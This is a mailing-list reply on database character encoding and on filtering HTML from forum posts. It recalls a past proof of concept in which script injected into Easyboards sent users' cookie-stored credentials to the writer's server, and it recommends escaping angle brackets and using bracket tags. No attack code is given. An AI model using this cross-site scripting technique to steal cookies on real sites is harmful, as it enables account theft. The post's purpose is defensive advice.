I would think that Q2 basically depends on which database you're using. You should be able to find out what character encoding your database supports by reading the documentation for the field type you're using (eg varchar).
To complete the answer to your first question with a "why", yes, you should filter out html, unless you know that all the users can be trusted 100% (and you know that you're not storing any sensitive information in cookies). In the olden days, Easyboards allowed html and, incidentally, javascript, AND stored the username and password in a cookie. It was a simple matter to write a script that called an image on my server with, as arguments, the cookie values (don't worry, I only did it as a proof of concept and filtered out the middle characters of all the passwords before posting it up! :-P). If all you store in the cookie is the session ID, you're probably safe from that type of attack. However, there's other annoying things people can do such as break the layout of your forum. A good solution for an untrusted forum (eg not the internal company forum) would be to turn all the < and > into < and > as suggested, and then to provide the alternative of using UBB-like tags, eg [b]..[/b] for bold, etc. You can pick these out with regular expressions yourself, or if you find them there are probably already libraries out there somewhere that will do this for you. -- If education is too expensive, try ignorance. --------------------------------------------------------------------- To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED]
